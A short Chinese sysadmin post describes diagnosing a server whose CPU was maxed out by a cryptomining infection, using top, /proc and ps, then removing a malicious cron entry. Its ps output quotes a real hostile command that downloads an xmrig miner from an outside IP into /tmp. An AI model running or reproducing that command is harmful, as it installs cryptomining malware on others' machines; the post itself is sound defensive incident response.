最近遇到一个问题,发现导致经常cpu爆满,导致tomcat,nginx等出现异常。
1、查看异常进程
top命令
2、查看PID对应的文件
ll /proc/PID/exe
3、通过ps命令得知文件来源
ps -ef | grep php
nobody 11036 10981 0 11:28 ? 00:00:00 wget -O /tmp/php http://91.201.42.5/xmrig_64?19517
4、由此知道是由wget 下载xmrig_64 这个文件生成了php这个病毒文件,百度之后发现是挖矿病毒,删除后还会自动生成。查找定时任务
ls /var/spool/cron
发现下面有一个nobody的文件,vi打开正是下载的东西,删除之后解决